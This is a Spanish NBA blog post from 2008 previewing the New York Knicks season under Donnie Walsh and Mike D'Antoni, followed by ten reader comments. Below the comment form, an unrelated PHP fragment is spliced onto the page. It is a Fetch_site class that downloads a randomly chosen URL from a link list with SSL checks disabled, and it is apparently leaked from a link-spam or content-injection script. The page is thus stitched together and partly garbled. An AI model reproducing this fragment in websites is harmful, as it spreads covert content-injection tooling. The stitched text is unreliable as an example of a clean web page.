New York Knicks: Borrón y cuenta nueva

18 de October de 2008 por txusma

Decía Frank Sinastra en su archiconocidísima canción que New York es la ciudad de las oportunidades, del resugir, del volver a empezar. Que es el sitio perfecto para llegar a ser el número 1. Por lo que respecta a la NBA, en la Gran Manzana hace más de 30 años que no son los número 1 y unos cuantos que más bien están en entre la clase baja de la liga, algo inaceptable para la franquicia que más dinero se gasta en salarios y una de las que más merchandising genera. Su último intento por volver a la élite, que involucró al posiblemente peor GM de la historia de la NBA, Isaiah Thomas, tan solo consiguió encarecer aún más la plantilla con contratos escandalosos para jugadores mediocres y dilapidar su ya de por sí maltrecha imagen.

El 2 de Abril fue contratado Donnie Walsh, ex GM de los Indiana Pacers, y su primera decisión después de un rápido análisis fue despedir, al precio que fuera, a un Isaiah Thomas que había ampliado su desastrosa gestión a los banquillos. Su segunda decisión fue la contratación de Mike D’Antoni, toda una declaración de intenciones. Sin duda, el ex-entrenador de los Suns simboliza el cambio y la esperanza para unos aficionados que se estaban acostumbrando a ser vapuleados y a aparecer más en los anecdotarios que en las crónicas deportivas. leedunkEn cambio, los movimientos de jugadores han sido mínimos, ya que tan solo el base Chris Duhon y el rookie italiano Danilo Gallinari se han incorporado a la plantilla este verano mientras que Renaldo Balkman, elección exclusivamente de Isaiah en el draft del año pasado, ha sido el único jugador en causar baja al haber sido traspasado a los Nuggets. Muchos rumores apuntaban también hacia la salida de Eddie Curry o Zach Randolph pero finalmente ninguno se ha materializado aunque no nos extrañaría que durante la temporada cualquiera de los 2 abandonara la franquicia a cambio principalmente de liberar salario a corto y medio plazo.

Así que D’Antoni posee una plantilla muy parecida a la que hundió Thomas en la miseria. Probablemente su juego exterior titular estará formado por Chris Duhon, Jamaal Crawford y Quentin Richardson, un base correcto y 2 jugadores a los que les va como anillo al dedo la filosofía “correr y tirar” y más teniendo en cuenta que Richardson ya coincidió con su nuevo entrenador en su época de los Suns, donde consiguió un buen rendimiento. Por dentro, Eddie Curry se caerá de la titularidad, que corresponderá a David Lee y Zach Randolph, una pareja más acorde a la nueva idea de juego.

En el banco esperarán jugadores muy interesantes como Stephon Marbury, que ha de reconducir sus relaciones con la franquicia y demostrar que nunca se le olvidó jugar a baloncesto, o Eddie Curry, al que no le están sentando bien las primeras afirmaciones que apuntan a su suplencia. En todo caso, Curry debería procurar hacer un esfuerzo por adaptarse porque puede ser una pieza importante contra wchandlerdeterminados equipos. Además, un grupo de jóvenes liderados por el alero de segundo año, Wilson Chandler, que realizó un final de temporada simplemente espectacular y al que habrá que seguir muy de cerca este año, y con Nate Robinson, que está sorprendiendo a D’Antoni por su capacidad atlética, y el rookie Danilo Gallinari como otros jugadores destacados. No se espera que Gallinari juegue muchos minutos en este inicio de temporada y más después de los problemas de espalda que lleva arrastrando desde el primer partido de las Summer Leagues, pero conforme pasen los meses y vaya ganando confianza seguro que dará que hablar.

D’Antoni ha llegado para hacer borrón y cuenta nueva y aportar un poco de lógica y buen juicio, y para ello dispone de una plantilla con muchas redundancias y algunos carácteres difíciles pero a los que les puede sacar aún un buen partido. Además recordemos que ésta es todavía una temporada de transición ya que al final de ella los Knicks liberarán 21 millones del contrato de Marbury y 7.6 del de Malik Rose, y al año siguiente harán lo propio con los 6.6 millones de Jerome James (¡gracias Isaiah!) y los 9.3 de Quentin Richardson. Todo ello, pensando en un nombre, el de LeBron James, al que muchos ya ven enfundado en la camiseta azul de los Knicks conviertido en la mayor máquina de generar dinero de la historia de la NBA.

Quinteto: Chris Duhon, Jamaal Crawford, Quentin Richardson, David Lee y Zach Randolph.

Sexto hombre: Wilson Chandler.

Pronóstico: Fuera de Playoffs.

Comenta

10 comentarios a esta entrada

  1. Cross dice:
    #1

    Después del despilfarro y la desidia de Isaiah Thomas que pretendía sacar a flote el equipo con jugadores con mal carácter y reputación como Curry o Randolph,parece que el remedio aún queda lejos de materializarse y esta temporada será otra para olvidar.No por D’Antoni que me supongo que este haciendo lo que pueda,sino por la herencia de jugadores que destroza muchas esperanzas.Si bien hay jugadores con mucha calidad y experiencia,estos no dejan de ser los mismos que el año pasado y lo mas díficil ahora es lograr un trapaso que reporte algo de bien viendo los jugadores que tienen el cartel de se vende : Un Eddy Curry que tuvo problemas cardiacos y cuya regularidad y aportación al equipo son cuestionables,un Randolph por el que parece que tienes que pagar por regalarle(curioso teniendo en cuenta que es un 20-10)y al cual se le conoce mas por comisaria(o por el McDonalds junto con Curry)y luego estan jugadores con sueldos desorbitados como Marbury,Jeffries o Jerome James(una buena temporada en Seattle le bastó para conseguir sus 6 millones anuales).Lo dicho,difícil traspaso.Además Gallinari me crea dudas,Robinson no es apreciado en los vestuarios,Crawford a veces no es el jugador de equipo que debería y Quentin Richardson está pendiente de ver si esto se convierte en un correcalles.La ilusión me la da Chandler(vaya potencial…),un Collins que quizás no sea muy bueno,pero que no mira solo al aro contrario y un David Lee en la sombra cogiendo rebotes.Lo dicho : Duhon y Gallinari no son la solución,queda mucho camino…

      Citar

  2. Jabho dice:
    #2

    Lo bueno de haber tocado fondo es que no puedes seguir cayendo. A partir de aquí los Knicks están en mejores manos y es cuestión de cierto tiempo. Los jugadores que tienen están sobre pagados pero no son además tan malos como parecían últimamente. Hay jugadores aprovechables (Crawford, Lee, Chandler e incluso Zach) y con tiempo y una caña y dos tipos de buen criterio seguro que van hacia arriba.

    y mientras tanto pues a disfrutar del estilo D´Antoni y seguro que consigue revalorizar un poco a algunos jugadores.

    completamente de acuerdo con el análisis en que empiezan de cero.

      Citar

  3. Javi dice:
    #3

    Seria exagerado decir que New York pasara a Playoffs. Yo, sinceramente, me conformo con que hagan una aceptable Regular Season. Y, sobre todo, que se les vea jugar al Baloncesto con un estilo definido. Eso sí que nos lo dará D”antoni. Como veis me conformo con poco. Lo demás, el paso a Playoffs, finales de conferencia o final de la NBA, vendrá con el tiempo. Lo importante ahora es ir haciendo hueco salarial y iniciar un proyecto serio y definido. No es el momento de pensar en Lebron, por mucha ilusión que nos haga su “futura” contratación.

      Citar

  4. TheDeerHunter dice:
    #4

    Para NY, el que porfin se hayan desecho de Isiah Thomas es como si les hubiese tocado la lotería. Al menos ahora se puede ver la luz al final del tunel.
    Es el momento de recuperar la ilusión y, al menos de momento, van por el buen camino. Están jugando bastante bien esta pretemporada.

    Hay buenos mimbres para hacer un papel, por lo menos digno, que es lo mínimo que se les debería exigir.
    Lo de entrar en playoffs… imposible para ellos.

      Citar

  5. Kantonyo dice:
    #5

    Como dice Jabho, parece que los Knicks han tocado fondo, y la contratacion de D’Antoni invita al optimismo en New York. La presión que siempre ha tenido este equipo posiblemente haya sido su peor handicap, y este año nadie de un duro por ellos. Pero no nos tenemos que olvidar que es la plantilla con mejores salarios de la NBA, y no creo que solo sea por mala gestión de Thomas, sino tambien porque muchos de sus jugadores en anteriores equipos tuvieron unas actuaciones destacadisimas: Crawford-Curry (Chicago), Marbury (Phoenix), Quentin (Clippers), Randolph (Portland).

    Yo me niego a creer que estos jugadores esten acabados y que hayan dicho su última palabra, confío en la mano de D’Antoni para manejar la situación. Además jovenes jugadores como David Lee, Chandler, Nate Robinson y Gallinari, vienen pegando fuerte.

    En resumen, la plantilla de New York, tiene talento y profundidad, y al mando uno de los entrenadores más respetados de la liga, no tienen nada que perder, y si mucho que demostrar. Yo los veo peleando hasta las últimas semanas por entrar en play-offs….

      Citar

  6. MagicJohnson32 dice:
    #6

    Si fuese fan de los Knicks, más que el fichaje de D’Antoni celebraría el cambio en los despachos, el haber puesto a Walsh al frente.

      Citar

  7. Viva_Dirk dice:
    #7

    Una cosa llevó a la otra ¿no?

    Coincido con todos en que por fin han puesto la franquicia en buenas manos, se lo van a pasar bien.

      Citar

  8. MagicJohnson32 dice:
    #8

    Claro, una cosa (Walsh) llevó a la otra (D’Antoni). Es lo que decía yo, que lo que más bien le hará a los Knicks es el cambio de GM.

      Citar

  9. Ivan Cortazar dice:
    #9

    NY esta esperando la temporada 011 para recindirle el contrato a varios jugadores actuales de la plantilla y contratar a LeBron, Chris Bosh, Steve Nash, Baron Davis, Leandro Barbosa, Boris Diaw, y capas, Dwayne Wade. no lo puedo creer, pero puede llegar a suceder.

      Citar

  10. Txusma dice:
    #10

    Todo parece encaminado a esa idea que comentas pero mi abuelo decia q no pusiera todos los huevos juntos en el mismo cesto…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>